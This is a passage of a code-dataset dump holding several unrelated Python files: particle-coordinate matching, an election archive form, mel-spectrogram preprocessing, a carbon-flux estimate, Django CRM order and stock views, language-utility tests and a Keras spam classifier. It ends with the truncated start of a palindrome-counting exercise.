pred_seen.append(pred_id)\n true_seen.append(true_id)\n\n pred_n = list(df[~c][smallest_error][\"pred_coor\"])[0]\n true_n = list(df[~c][smallest_error][\"true_coor\"])[0]\n mapping_table[h_idx].append([true_n, pred_n])\n\n \"\"\"Add matched to the table/dataframe\"\"\"\n for idx, (true, pred) in enumerate(mapping_table[h_idx]):\n df_table[\"h\"].append(h_idx)\n x, y, z, d = list(map(float, true.split(\" \")))\n df_table[\"x_t\"].append(x)\n df_table[\"y_t\"].append(y)\n df_table[\"z_t\"].append(z)\n df_table[\"d_t\"].append(d)\n x, y, z, d = list(map(float, pred.split(\" \")))\n df_table[\"x_p\"].append(x)\n df_table[\"y_p\"].append(y)\n df_table[\"z_p\"].append(z)\n df_table[\"d_p\"].append(d)\n df_table[\"rmse\"].append(error[idx])\n n_match = len(mapping_table[h_idx])\n\n \"\"\"Add non-matched to the table/dataframe\"\"\"\n\n true_unmatched = list(\n set(df[\"true_coor\"].unique()) - set([x[0] for x in mapping_table[h_idx]]))\n pred_unmatched = list(\n set(df[\"pred_coor\"].unique()) - set([x[1] for x in mapping_table[h_idx]]))\n\n for p in true_unmatched:\n mapping_table[h_idx].append([p, None])\n x, y, z, d = list(map(float, p.split(\" \")))\n df_table[\"h\"].append(h_idx)\n df_table[\"x_t\"].append(x)\n df_table[\"y_t\"].append(y)\n df_table[\"z_t\"].append(z)\n df_table[\"d_t\"].append(d)\n df_table[\"x_p\"].append(np.nan)\n df_table[\"y_p\"].append(np.nan)\n df_table[\"z_p\"].append(np.nan)\n df_table[\"d_p\"].append(np.nan)\n df_table[\"rmse\"].append(np.nan)\n\n for p in pred_unmatched:\n mapping_table[h_idx].append([None, p])\n x, y, z, d = list(map(float, p.split(\" \")))\n df_table[\"h\"].append(h_idx)\n df_table[\"x_p\"].append(x)\n df_table[\"y_p\"].append(y)\n df_table[\"z_p\"].append(z)\n df_table[\"d_p\"].append(d)\n df_table[\"x_t\"].append(np.nan)\n df_table[\"y_t\"].append(np.nan)\n df_table[\"z_t\"].append(np.nan)\n df_table[\"d_t\"].append(np.nan)\n df_table[\"rmse\"].append(np.nan)\n\n mtime = time.time() - start_time\n logger.info(\n f\"... matched {n_match} particles in {mtime} s. RMSE = {np.mean(error)}\")\n\n mapping_table[\"rmse\"][h_idx] = error\n\n return mapping_table, df_table\n\n\nif __name__ == \"__main__\":\n\n description = \"1. Cluster predictions using (x,y,x,d) predictions in N planes from M workers\\n\"\n description += \"2. 
Pair matched particles against true or the standard method predictions\"\n\n parser = ArgumentParser(\n description=description\n )\n parser.add_argument(\n \"-c\",\n dest=\"model_config\",\n type=str,\n default=False,\n help=\"Path to the model configuration (yml) containing your inputs.\"\n )\n parser.add_argument(\n \"-m\",\n dest=\"match\",\n type=str,\n default=False,\n help=\"Whether to match predictions against truth or standard method values.\"\n )\n parser.add_argument(\n \"-t\",\n dest=\"table\",\n type=str,\n default=False,\n help=\"Pandas table to match predicted particles against.\"\n )\n\n args_dict = vars(parser.parse_args())\n config_file = args_dict.pop(\"model_config\")\n match = bool(int(args_dict.pop(\"match\")))\n table = args_dict.pop(\"table\")\n table = str(table) if table else False\n\n if not os.path.isfile(config_file):\n raise OSError(\"A model config file is required. Exiting.\")\n \n with open(config_file) as cf:\n conf = yaml.load(cf, Loader=yaml.FullLoader)\n\n n_nodes = conf[\"inference\"][\"n_nodes\"]\n n_gpus = conf[\"inference\"][\"gpus_per_node\"]\n threads_per_gpu = conf[\"inference\"][\"threads_per_gpu\"]\n workers = int(n_nodes * n_gpus * threads_per_gpu)\n\n save_loc = conf[\"save_loc\"]\n inf_save_loc = conf[\"inference\"][\"data_set\"][\"name\"]\n path_to_preds = os.path.join(save_loc, inf_save_loc, \"propagated\")\n distance_threshold = conf[\"inference\"][\"distance_threshold\"]\n\n ############################################################\n # Initialize logger to stream to stdout\n root = logging.getLogger()\n root.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(levelname)s:%(name)s:%(message)s')\n\n # Stream output to stdout\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n ch.setFormatter(formatter)\n root.addHandler(ch)\n\n # Save the log file\n logger_name = os.path.join(os.path.join(\n save_loc, f\"{inf_save_loc}/clustering_log.txt\"))\n fh = logging.FileHandler(logger_name,\n mode=\"w\",\n encoding='utf-8')\n fh.setLevel(logging.INFO)\n fh.setFormatter(formatter)\n root.addHandler(fh)\n ############################################################\n \"\"\"Obtain the pred and true files produced by the workers\"\"\"\n fns = glob.glob(os.path.join(path_to_preds, \"*txt\"))\n\n preds = [x for x in fns if \"pred\" in x.split(\"/\")[-1]]\n\n logger.info(f\"The number of workers used during inference was {workers}\")\n logger.info(f\"There are {len(preds)} files containing predicted coordinates\")\n\n if len(preds) != workers:\n logger.warning(\n \"The number of files with coordinates is not equal to the number of workers in the config file\")\n\n pred_coordinates = defaultdict(list)\n for fn in preds:\n with open(fn, \"r\") as fid:\n for line in fid.readlines():\n h, x, y, z, d = list(map(int, line.split(\" \")))\n pred_coordinates[h].append([x, y, z, d])\n\n if match:\n if table:\n true_coordinates = defaultdict(list)\n match_table = pd.read_csv(table)\n for i, row in match_table.iterrows():\n h = row[\"h\"]\n x, y, z, d = row[\"x\"], row[\"y\"], row[\"z\"], row[\"d\"]\n true_coordinates[h].append([x,y,z,d])\n else:\n truth = [x for x in fns if \"true\" in x.split(\"/\")[-1]]\n true_coordinates = defaultdict(list)\n for fn in truth:\n with open(fn, \"r\") as fid:\n for line in fid.readlines():\n h, x, y, z, d = list(map(int, line.split(\" \")))\n true_coordinates[h].append([x, y, z, d])\n else:\n true_coordinates = None\n\n# # Round 1 \n# coors_table, df_table = create_table(\n# distance_threshold=10.0*scale_x,\n# 
true_coordinates=true_coordinates,\n# pred_coordinates=pred_coordinates,\n# match=match\n# )\n# df_table = pd.DataFrame.from_dict(df_table)\n \n# # Round 2\n# dff = {}\n# for h in df_table[\"h\"].unique():\n# c = (df_table[\"h\"] == h)\n# dff[h] = df_table[c][[\"x_p\", \"y_p\", \"z_p\", \"d_p\"]].values\n \n# coors_table, df_table = create_table(\n# distance_threshold=distance_threshold,\n# true_coordinates=true_coordinates,\n# pred_coordinates=dff,\n# match=match\n# )\n \n coors_table, df_table = create_table(\n distance_threshold=distance_threshold,\n true_coordinates=true_coordinates,\n pred_coordinates=pred_coordinates,\n match=match\n )\n\n \"\"\"Save the table as a dictionary\"\"\"\n save_fn = os.path.join(save_loc, inf_save_loc,\n f\"prediction_table_{str(distance_threshold)}.pkl\")\n with open(save_fn, \"wb\") as fid:\n joblib.dump(coors_table, fid)\n\n \"\"\"Save the table to csv\"\"\"\n df_table = pd.DataFrame.from_dict(df_table)\n df_table.to_csv(os.path.join(\n save_loc, inf_save_loc, f\"prediction_table_{str(distance_threshold)}.csv\"))\n","sub_path":"applications/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":19549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"432046435","text":"from onegov.election_day.models import ArchivedResult\nfrom onegov.form import Form\nfrom onegov.form.fields import MultiCheckboxField\nfrom wtforms.fields.html5 import DateField\nfrom wtforms import StringField\nfrom onegov.election_day import _\n\n\nclass ArchiveSearchForm(Form):\n\n term = StringField(\n label=_(\"Text Retrieval\"),\n render_kw={'size': 4, 'clear': True},\n description=_(\n \"Searches the title of the election/vote. \"\n \"Use wildcards (*) to find more results, e.g. Nationalrat*.\"\n ),\n )\n\n from_date = DateField(\n label=_(\"From date\"),\n render_kw={'size': 4}\n )\n\n to_date = DateField(\n label=_(\"To date\"),\n render_kw={'size': 4, 'clear': False}\n )\n\n answers = MultiCheckboxField(\n label=_(\"Voting result\"),\n choices=ArchivedResult.types_of_answers,\n render_kw={'size': 4}\n )\n\n # Is always hidden since item_type in url will filter the types\n types = MultiCheckboxField(\n label=_(\"Type\"),\n render_kw={'size': 4, 'clear': False, 'hidden': True},\n choices=ArchivedResult.types_of_results,\n description=_(\n \"Compound of elections field summarizes all related elections\"\n \" in one. To display all elections,\"\n \" uncheck 'Compound of Elections'\")\n )\n\n domains = MultiCheckboxField(\n label=_(\"Domain\"),\n render_kw={'size': 8, 'clear': False},\n choices=ArchivedResult.types_of_domains\n )\n\n def on_request(self):\n # Removes the csrf token from query params\n if hasattr(self, 'csrf_token'):\n self.delete_field('csrf_token')\n\n def select_all(self, name):\n field = getattr(self, name)\n if not field.data:\n field.data = list(next(zip(*field.choices)))\n\n def toggle_hidden_fields(self, model):\n \"\"\" Hides the answers field for the election view and moves the field to\n the right side with render_kw. 
\"\"\"\n if model.item_type in ('election', 'election_compound'):\n self.answers.render_kw['hidden'] = True\n self.domains.render_kw['size'] = 12\n else:\n self.domains.render_kw['size'] = 8\n self.answers.render_kw['hidden'] = False\n\n def apply_model(self, model):\n\n self.term.data = model.term\n self.from_date.data = model.from_date\n self.to_date.data = model.to_date\n self.answers.data = model.answers\n self.types.data = model.types\n self.domains.data = model.domains\n\n self.select_all('domains')\n self.select_all('types')\n self.select_all('answers')\n self.toggle_hidden_fields(model)\n","sub_path":"src/onegov/election_day/forms/archive.py","file_name":"archive.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
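For reference, the trick `select_all` uses in the record above can be seen in isolation (illustrative data, not from the project): `zip(*choices)` transposes the wtforms-style `(value, label)` pairs, and `next()` pulls out the tuple of values.

# minimal sketch of the select_all idiom, with made-up choice pairs
choices = [('federation', 'Federation'), ('canton', 'Canton')]
print(list(next(zip(*choices))))  # ['federation', 'canton']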
+{"seq_id":"291829041","text":"\"\"\"Create downsampled spectrograms from a (possibly sampled) wav file\n\nusage: deconstruct_wav.py <wav_file>\n\noptions:\n -h, --help Show this help message and exit\n\"\"\"\nfrom kkpthlib.datasets.speech.audio_processing.audio_tools import herz_to_mel, mel_to_herz\nfrom kkpthlib.datasets.speech.audio_processing.audio_tools import stft, istft\nfrom kkpthlib.utils import split\nfrom kkpthlib.utils import split_np\nfrom kkpthlib.utils import interleave_np\nfrom kkpthlib.utils import interleave\nfrom docopt import docopt\nfrom scipy.io import wavfile\nfrom scipy import signal\nfrom shutil import copyfile\nimport os\nimport numpy as np\nimport matplotlib\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\n\ndef melspectrogram_preprocess(data, sample_rate):\n # takes in a raw sequence scaled between -1 and 1 (such as loaded from a wav file)\n\n # 'Center freqs' of mel bands - uniformly spaced between limits\n x = data\n sr = sample_rate\n\n # hardcode these values...\n n_mels = 256\n\n mel_freq_min = 125\n mel_freq_max = 7600\n\n stft_size = 6 * 256\n stft_step = 256\n\n n_fft = stft_size\n n_step = stft_step\n fmin = mel_freq_min\n fmax = mel_freq_max\n\n # preemphasis filter\n preemphasis_coef = 0.97\n ref_level_db = 20\n min_level_db = -90\n\n # preemphasis filter\n coef = preemphasis_coef\n b = np.array([1.0, -coef], x.dtype)\n a = np.array([1.0], x.dtype)\n preemphasis_filtered = signal.lfilter(b, a, x)\n\n # mel weights\n # nfft - 1 because onesided=False cuts off last bin\n weights = np.zeros((n_mels, n_fft - 1), dtype=\"float32\")\n\n fftfreqs = np.linspace(0, float(sr) / 2., n_fft - 1, endpoint=True)\n\n min_mel = herz_to_mel(fmin)\n max_mel = herz_to_mel(fmax)\n mels = np.linspace(min_mel, max_mel, n_mels + 2)\n mel_f = mel_to_herz(mels)[:, 0]\n\n fdiff = np.diff(mel_f)\n ramps = np.subtract.outer(mel_f, fftfreqs)\n\n for i in range(n_mels):\n # lower and upper slopes for all bins\n lower = -ramps[i] / float(fdiff[i])\n upper = ramps[i + 2] / float(fdiff[i + 1])\n\n # .. then intersect them with each other and zero\n weights[i] = np.maximum(0., np.minimum(lower, upper))\n # slaney style norm\n enorm = 2.0 / (mel_f[2 : n_mels + 2] - mel_f[:n_mels])\n weights *= enorm[:, np.newaxis]\n mel_weights = weights\n\n # do stft\n ref_level_db = ref_level_db\n min_level_db = min_level_db\n def _amp_to_db(a):\n min_level = np.exp(min_level_db / 20. * np.log(10))\n return 20 * np.log10(np.maximum(min_level, a))\n\n # ONE SIDED MUST BE FALSE!!!!!!!!\n abs_stft = np.abs(stft(preemphasis_filtered, fftsize=n_fft, step=n_step, real=True, compute_onesided=False))\n melspec_ref = _amp_to_db(np.dot(mel_weights, abs_stft.T)) - ref_level_db\n melspec_clip = np.clip((melspec_ref - min_level_db) / -min_level_db, 0, 1)\n return melspec_clip.T\n\nif __name__==\"__main__\":\n args = docopt(__doc__)\n wav_file = args[\"<wav_file>\"]\n\n fs, d = wavfile.read(wav_file)\n # put it between -1 and 1\n d = d.astype(\"float32\") / (2 ** 15)\n mel = melspectrogram_preprocess(d, fs)\n max_frame_count = mel.shape[0]\n # pad to even multiple of 2, 4, 8\n divisors = [2, 4, 8]\n for di in divisors:\n # nearest divisible number above, works because the largest divisor divides by the smaller ones\n # we need something that has a length in time (frames) divisible by 2 4 and 8 due to the nature of melnet\n # same for frequency but frequency is a power of 2 so no need to check it\n q = int(max_frame_count / di)\n if float(max_frame_count / di) == int(max_frame_count / di):\n max_frame_count = di * q\n else:\n max_frame_count = di * (q + 1)\n new_mel = np.zeros((max_frame_count, mel.shape[1])).astype(mel.dtype)\n new_mel[:len(mel)] = mel\n mel = new_mel\n\n input_axis_split_list = [2, 1, 2, 1, 2]\n\n all_x_splits = []\n x_t = mel[None, ..., None]\n all_x_splits.append((x_t, x_t))\n for aa in input_axis_split_list:\n all_x_splits.append(split_np(x_t, axis=aa))\n x_t = all_x_splits[-1][0]\n # out, split 1 time, split 2 times, etc... down to the smallest split\n base_folder = \"deconstructed/\"\n if not os.path.exists(base_folder):\n os.mkdir(base_folder)\n copyfile(wav_file, base_folder + wav_file.split(\"/\")[-1])\n\n plt.plot(d)\n plt.savefig(base_folder + wav_file.split(\"/\")[-1].split(\".\")[0] + \".png\")\n plt.close()\n\n for _n in range(len(all_x_splits)):\n if _n == (len(all_x_splits) - 1):\n fname_base = \"output_unnormalized_samples\"\n else:\n fname_base = \"tier{}_{}_unnormalized_samples\"\n\n this_mel_split = all_x_splits[::-1][_n][0]\n np.save(base_folder + fname_base.format(_n, 0) + \".npy\", this_mel_split)\n\n plt.imshow(this_mel_split[0, ..., 0])\n plt.title(wav_file.split(\"/\")[-1])\n plt.savefig(base_folder + fname_base.format(_n, 0) + \".png\")\n plt.close()\n\n plt.imshow(this_mel_split[0, ..., 0].T)\n plt.gca().invert_yaxis()\n plt.title(wav_file.split(\"/\")[-1])\n plt.savefig(base_folder + fname_base.format(_n, 0) + \"_flip.png\")\n plt.close()\n\n\n this_mel_split = all_x_splits[::-1][_n][1]\n np.save(base_folder + fname_base.format(_n, 1) + \".npy\", this_mel_split)\n\n plt.imshow(this_mel_split[0, ..., 0])\n plt.title(wav_file.split(\"/\")[-1])\n plt.savefig(base_folder + fname_base.format(_n, 1) + \".png\")\n plt.close()\n\n plt.imshow(this_mel_split[0, ..., 0].T)\n plt.gca().invert_yaxis()\n plt.title(wav_file.split(\"/\")[-1])\n plt.savefig(base_folder + fname_base.format(_n, 1) + \"_flip.png\")\n plt.close()\n","sub_path":"examples/attention_melnet_cmdline/deconstruct_wav.py","file_name":"deconstruct_wav.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"317644557","text":"import iris\nimport sys\n\nsys.path.append('/home/michael/Desktop/git/Masters/SST_daily')\nimport make_cube_SST\n\n'''\nIn the following script, we calculate the carbon fluxes from this equation:\n\nCarbon Flux = constant * (windspeed)**2 * [(partial pressure of dissolved CO2) - (partial pressure of atmospheric CO2)]\n\n\nFor the purposes of this rough calculation, we have:\n\nignored the effect of advection\nignored the dependence on solubility as this is assumed to be small\nassumed the gas transfer velocity to be proportional to windspeed squared\n\nWe shall also:\n\nset constant = 1,\nassume that the partial pressure of atmospheric CO2 is constant and equal to 35.5 Pa\nassume the variation in dissolved CO2 is due to temperature alone, and follows\n\nd(pCO2)/dT = 0.0423(pCO2)\n\nleading to (pCO2) = A * exp(0.0423*T)\n\nTaking zero flux at 300K gives A = 0.000096\n\n'''\n\nSST_cubes = iris.load('/home/michael/Desktop/git/Masters/SST_daily/ersst.201201.nc')\n# Wspd_cubes = iris.load('/home/michael/Desktop/git/Masters/Wspd_daily/Wspd_cubes.nc')\n\nSST = SST_cubes[0]\nSST.convert_units('kelvin')\nWind = 5\n\n# Wind.units = None\n\ngas_transfer_velocity = 0.31*Wind**2 - 0.91*Wind + 7.76\n\ncarbon_flux = 0.328 * (0.0001 * iris.analysis.maths.exp(0.0423 * SST) - 35.5)\ncarbon_flux.rename('carbon_flux')\n# carbon_flux.units = 'mol m-2 yr-1'\n\n# mean_carbon_flux = carbon_flux.collapsed('time', iris.analysis.MEAN)\n# mean_carbon_flux.rename('mean_carbon_flux')\n\n# carbon_flux_anomoly = make_cube_SST.convert_to_anomoly(carbon_flux.data, 0, 0)\n\nall_cubes = (carbon_flux, SST)\n\niris.save(all_cubes, 'carbon_flux_global.nc')","sub_path":"Carbon_Fluxes/carbon_fluxes_global.py","file_name":"carbon_fluxes_global.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
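A minimal scalar sketch of the relation described in the docstring above, using the same constants the script hardcodes (0.328 and A = 0.0001; the function name is illustrative, and the iris cube machinery is deliberately left out):

import math

def scalar_carbon_flux(sst_kelvin, p_atm=35.5, a=0.0001, k=0.328):
    # dissolved pCO2 is assumed to follow d(pCO2)/dT = 0.0423 * pCO2,
    # i.e. pCO2 = A * exp(0.0423 * T)
    p_sea = a * math.exp(0.0423 * sst_kelvin)
    return k * (p_sea - p_atm)

print(scalar_carbon_flux(290.0))  # roughly -4.7 (ocean uptake)
print(scalar_carbon_flux(305.0))  # roughly +1.5 (outgassing)
# with these constants the flux changes sign near 302 K rather than exactly 300 K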
+{"seq_id":"159443343","text":"from django.shortcuts import render, HttpResponse, redirect\nfrom django.db.models import Q,F\nfrom django.core.paginator import Paginator,EmptyPage,PageNotAnInteger\nfrom crm import formvaild\nfrom crm import models\nimport json\nfrom django.views import View\nimport datetime,time\n\nclass DateEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj,datetime.datetime):\n return obj.strftime(\"%Y-%m-%d %H:%M:%S\")\n else:\n return json.JSONEncoder.default(self,obj)\ndef home(request):\n return render(request,'crm/index.html',{'title':'index'})\n\n\nclass Conditions:\n @staticmethod\n def orderListQ(lst):\n con = Q()\n # lst = [{\"key1\":[]},{\"key2\":[]},{\"key3\":[]}]\n for i in lst:\n q = Q()\n if i[0] == \"addtime\" or i[0] == \"ordervalue\" or i[0] == \"arrears\":\n q.connector = \"AND\"\n q.children.append((i[0] + \"__gte\", i[1][0]))\n q.children.append((i[0] + \"__lte\", i[1][1]))\n else:\n q.connector = \"OR\"\n for j in i[1]:\n q.children.append((i[0], j))\n con.add(q, \"AND\")\n return con\ndef initdata(req):\n resp = \"ok\"\n try:\n models.initData()\n except Exception as e:\n resp = e.__str__()\n return HttpResponse(resp)\ndef createorder(req):\n if req.method == \"GET\":\n form_obj = formvaild.CustomerOrderForm()\n order_list = formvaild.OrderListForm()\n factory_select = formvaild.FactorySelectForm()\n # time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\n return render(req, \"crm/createorder.html\", {\"formObj\": form_obj, \"orderList\": order_list,\"factory_select\":factory_select})\n formObj = formvaild.CustomerOrderForm(req.POST)\n resp = {\"msg\": \"\", \"status\": \"ok\", \"err\": formObj.errors}\n if formObj.is_valid():\n print(formObj.cleaned_data)\n orderNum = formObj.cleaned_data[\"ordernum\"]\n orderList = json.loads(req.POST.get(\"orderList\"))\n try:\n models.CustomerOrder.objects.create(**formObj.cleaned_data)\n li = list(map(lambda x: models.OrderList(order_id=orderNum, 
pm_id=x[\"pm_id\"], productnum=x[\"productnum\"]),\n orderList))\n models.OrderList.objects.bulk_create(li)\n updateStock(orderList,\"minus\")\n except Exception as e:\n print(e)\n resp[\"msg\"] = e.__str__()\n resp[\"status\"] = \"err\"\n else:\n resp[\"status\"] = \"err\"\n print(resp)\n return HttpResponse(json.dumps(resp))\n\ndef getSelect(req):\n if req.method == \"POST\":\n key = req.POST.get(\"key\")\n if key == \"ocn__name\":\n data = models.Customer.objects.all().values(\"id\", \"name\")\n return HttpResponse(json.dumps({\"data\":list(data)}))\n elif key == \"on__name\":\n data = models.CustomerOrderType.objects.all().values(\"id\", \"name\")\n return HttpResponse(json.dumps({\"data\":list(data)}))\n elif key == \"os__name\":\n data = models.OrderStatus.objects.all().values(\"id\", \"name\")\n return HttpResponse(json.dumps({\"data\":list(data)}))\n elif key == \"ocn__ct__name\":\n data = models.CustomerType.objects.all().values(\"id\", \"name\")\n return HttpResponse(json.dumps({\"data\":list(data)}))\n\ndef orderListDetail(req):\n colsMap = {\n \"pm__model\": \"产品型号\",\n \"pm__value\": \"产品单价\",\n \"productnum\": \"产品数量\",\n }\n orderNum = req.POST.get(\"orderNum\")\n print(req.POST)\n ret = models.OrderList.objects.filter(order_id=orderNum).select_related(\"pm_id\").values(\"pm__model\",\"pm__value\",\"productnum\")\n print(ret.query)\n print(list(ret))\n return HttpResponse(json.dumps({\"data\":list(ret),\"tablehead\":colsMap}))\n\nclass Orderlist(View):\n colsMap = {\n \"ordernum\": \"订单号\",\n \"ordervalue\": \"订单总金额\",\n \"arrears\": \"订单欠款\",\n \"addtime\":\"下单时间\",\n \"ocn__name\": \"客户\",\n \"ocn__ct__name\": \"客户类型\",\n \"on__name\": \"订单类型\",\n \"os__name\": \"订单状态\",\n \"comment\": \"备注\",\n }\n\n def get(self,req):\n return render(req,\"crm/orderlist.html\",{\"selectOptions\": self.colsMap})\n\n def paser(self,x):\n tmp = x[0]\n if \"__name\" in x[0]:\n tmp = x[0].replace(\"_name\", \"id\")\n elif \"comment\" == x[0]:\n tmp = x[0]+\"__contains\"\n return (tmp,x[1])\n\n def post(self,req):\n obj = req.POST.get(\"data\")\n pn = req.POST.get(\"pn\")\n page_number = req.POST.get(\"page_number\")\n obj = json.loads(obj)\n obj = list(map(lambda x:self.paser(x),obj.items()))\n ret = models.CustomerOrder.objects.filter(Conditions.orderListQ(obj)).select_related(\"on_id\",\"os_id\",\"ocn_id\").values(\n *self.colsMap.keys())\n p = Paginator(list(ret), page_number)\n # print(ret.query)\n return HttpResponse(json.dumps({\n \"data\":p.page(pn).object_list,\n \"page_range\":[p.page_range.start,p.page_range.stop],\n \"total_page\":p.num_pages,\n \"tablehead\":self.colsMap},cls=DateEncoder))\n\ndef stocklist(req):\n if req.method == \"GET\":\n data = models.Stock.objects.all()\n return render(req, \"crm/stocklist.html\", {\"data\": data})\n\nclass Storage(View):\n def get(self,req):\n stock_list = formvaild.StorageForm()\n all = models.Stock.objects.select_related(\"pm_id\",\"pm__fn_id\").all().values(\"pm__model\",\"number\",\"pm__fn__name\")\n print(list(all))\n return render(req, \"crm/storage.html\", {\"stock_list\": list(all)})\n\n def post(self,req):\n return HttpResponse(\"post\")\n\nclass Customer(View):\n def get(self,req):\n formObj = formvaild.CustomerForm()\n return render(req, \"crm/customer.html\", {\"formobj\": formObj})\n\n def post(self,req):\n return HttpResponse(\"post\")\n\nclass CreatePurchaseOrder(View):\n @staticmethod\n def addProduct(req):\n fn_id = req.POST.get(\"fn_id\")\n ret= models.ProductModel.objects.filter(fn_id=fn_id).values()\n return 
HttpResponse(json.dumps({\"pms\":list(ret)}))\n\n def get(self,req):\n form_obj = formvaild.PurchaseOrderForm()\n order_list = formvaild.OrderListForm()\n # return render(req, \"crm/createpurchaseorder.html\", {\"formObj\": form_obj, \"orderList\": order_list}) order_list = formvaild.OrderListForm()\n return render(req, \"crm/createpurchaseorder.html\", {\"formObj\": form_obj})\n\n def post(self,req):\n formObj = formvaild.PurchaseOrderForm(req.POST)\n resp = {\"msg\": \"\", \"status\": \"ok\", \"err\": formObj.errors}\n if formObj.is_valid():\n print(formObj.cleaned_data)\n orderNum = formObj.cleaned_data[\"ordernum\"]\n orderList = json.loads(req.POST.get(\"orderList\"))\n try:\n models.PurchaseOrder.objects.create(**formObj.cleaned_data)\n li = list(\n map(lambda x: models.PurchaseOrderList(order_id=orderNum, pm_id=x[\"pm_id\"], productnum=x[\"productnum\"]),\n orderList))\n models.PurchaseOrderList.objects.bulk_create(li)\n updateStock(orderList,\"add\")\n except Exception as e:\n print(e)\n resp[\"msg\"] = e.__str__()\n resp[\"status\"] = \"err\"\n else:\n resp[\"status\"] = \"err\"\n print(resp)\n return HttpResponse(json.dumps(resp))\n\ndef updateStock(pmlist,opt):\n for one in pmlist:\n pm_id = one[\"pm_id\"]\n number = one[\"productnum\"]\n o = models.Stock.objects.filter(pm_id=pm_id)\n if o.exists():\n if opt == \"add\":\n o.update(number=F(\"number\") + number)\n else:\n o.update(number=F(\"number\") - number)\n else:\n models.Stock.objects.create(pm_id=pm_id, number=number)\n\nclass Ajax:\n @staticmethod\n def checkStock(req):\n data = req.POST.get(\"data\")\n li = json.loads(data)[\"list\"]\n dic = {}\n for i in li:\n pm_id = i[\"pm_id\"]\n number = int(i[\"productnum\"])\n if dic.get(pm_id):\n dic[pm_id] = dic[pm_id] + number\n else:\n dic[pm_id] = number\n ret = {\"msg\": \"\",\"status\":\"ok\"}\n for i,n in dic.items():\n o = models.Stock.objects.filter(pm_id=i).values(\"number\",\"pm__model\").first()\n if o[\"number\"] < n:\n ret[\"status\"] = \"err\"\n ret[\"msg\"]+=\"%s 库存数量%d 少于订单数量%s\"%(o[\"pm__model\"],o[\"number\"],dic[i])\n print(ret)\n return HttpResponse(json.dumps(ret))","sub_path":"crm/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"170671809","text":"import pickle\n\nfrom nose.tools import assert_not_equal, eq_, raises\n\nfrom ...dependencies import solve\nfrom ...dependencies.errors import DependencyError\nfrom ..language import Language, LanguageUtility, is_badword, is_stopword\n\n\ndef process_is_badword():\n def is_badword(word):\n return word == \"badword\"\n return is_badword\n\nmy_is_badword = LanguageUtility(\"is_badword\", process_is_badword)\n\ndef test_language_utility():\n eq_(is_badword == is_badword, True)\n eq_(is_badword != is_badword, False)\n\n\ndef test_language():\n\n l = Language('revscoring.languages.test', [my_is_badword])\n\n assert is_badword in l.context\n eq_(l.context[is_badword]()(\"badword\"), True)\n\n recovered_l = pickle.loads(pickle.dumps(l))\n eq_(recovered_l, l)\n eq_(l == 5678, False)\n eq_(l != 5678, True)\n recovered_context = recovered_l.context\n\n assert is_badword in recovered_context\n eq_(recovered_context[is_badword]()(\"badword\"), True)\n\n@raises(DependencyError)\ndef test_not_implemented():\n\n l = Language('revscoring.languages.test', [])\n solve(is_stopword, context=l.context)\n\ndef test_from_config_module():\n config = {\n 'languages': {\n 'english': {\n 'module': 
\"revscoring.languages.english\"\n }\n }\n }\n\n english = Language.from_config(config, 'english')\n english.solve(is_badword)\n\n@raises(RuntimeError)\ndef test_from_config_class():\n config = {\n 'languages': {\n 'english': {\n 'class': \"revscoring.languages.Language\",\n 'param': \"Some param\"\n }\n }\n }\n\n english = Language.from_config(config, 'english')\n","sub_path":"revscoring/languages/tests/test_language.py","file_name":"test_language.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"314351690","text":"import os\nimport time\nimport pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split as tts\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef main():\n if not(os.path.exists(\"/home/xvpher/PythonML/MLCodes/Spambase/Dataset/spamdata.csv\")):\n print(\"Could not find the data file\")\n return\n df = pd.read_csv(\"/home/xvpher/PythonML/MLCodes/Spambase/Dataset/spamdata.csv\")\n features = df.iloc[:,0:57].values\n labels = df.iloc[:,57].values\n scaler = StandardScaler()\n features = scaler.fit_transform(features)\n X_train, X_test, y_train, y_test = tts(features, labels, test_size=0.25, shuffle=True, random_state=8)\n model = tf.keras.models.Sequential()\n model.add(tf.keras.layers.Dense(32,activation='relu',input_dim=57,kernel_initializer='random_normal'))\n model.add(tf.keras.layers.Dense(32,activation='relu',kernel_initializer='random_normal'))\n model.add(tf.keras.layers.Dense(1,activation='sigmoid',kernel_initializer='random_normal'))\n model.compile(optimizer='adam',loss='binary_crossentropy',metrics=['accuracy'])\n model.fit(X_train,y_train,batch_size=10,epochs=50)\n model.save(\"Neural_Network.model\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Neural Network/Neural_Classifier.py","file_name":"Neural_Classifier.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"565232475","text":"\"\"\"\n1215. [S/W Problem Solving Basics] Day 3 - Palindrome 1\n\nA word or sentence that reads the same backwards as forwards, such as \"level\", is called a palindrome (回文).\n\nGiven an 8x8 board of letters, count the total number of palindromes of the given length, looking along both rows and columns.\n\nFor a board like the one above, there are 4 palindromes of length 5 (marked with red borders), so 4 should be returned.\n\n\n[Constraints]\n\nEach cell holds a C-language char, one of 'A', 'B' or 'C'.\n\nThe board is always a square.\n\nABA is a palindrome, and so is ABBA. A on its own is also a palindrome of length 1.\n\nRows and columns are each judged along straight lines only.\n\nThat is, in the example, following the yellow path gives a palindrome of length 7, but it is not counted because it is not a straight line.\n\n\n[Input]\n\nThe first line of each test case gives the length of the palindrome to find, and the test case follows on the next line.\n\nA total of 10 